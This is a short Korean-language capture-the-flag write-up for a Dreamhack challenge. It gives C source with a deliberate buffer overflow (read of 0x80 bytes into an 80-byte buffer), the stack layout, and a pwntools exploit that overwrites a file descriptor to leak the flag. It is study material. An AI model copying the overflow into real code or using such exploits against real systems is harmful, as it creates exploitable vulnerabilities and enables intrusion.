#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#define FLAG_SIZE 0x45
void alarm_handler() {
puts("TIME OUT");
exit(-1);
}
void initialize() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
signal(SIGALRM, alarm_handler);
alarm(30);
}
char *flag;
int main(int argc, char *argv[]) {
int stdin_fd = 0;
int stdout_fd = 1;
int flag_fd;
int tmp_fd;
char buf[80];
initialize();
// read flag
flag = (char *)malloc(FLAG_SIZE);
flag_fd = open("./flag", O_RDONLY);
read(flag_fd, flag, FLAG_SIZE);
close(flag_fd);
tmp_fd = open("./tmp/flag", O_WRONLY);
write(stdout_fd, "Your Input: ", 12);
read(stdin_fd, buf, 0x80);
write(tmp_fd, flag, FLAG_SIZE);
write(tmp_fd, buf, 80);
close(tmp_fd);
return 0;
}-
flag에 flag를 저장한다. -
tmp_fd에 flag를 write한다. -
우리가
buf를 read할 때 0x80만큼 받기 때문에 overflow를 하면서tmp_fd를 1로 수정을 해보자!buf : [rbp-0x60] tmp_fd*** : [rbp-0x10] flag_fd : [rbp-0xc] stdout_fd : [rbp-0x8] stdin_fd : [rbp-0x4]
exploit
from pwn import *
p = remote('host3.dreamhack.games', 19657)
payload = b'A' * 0x50 + p64(1)
p.sendafter(b'Input: ', payload)
p.interactive()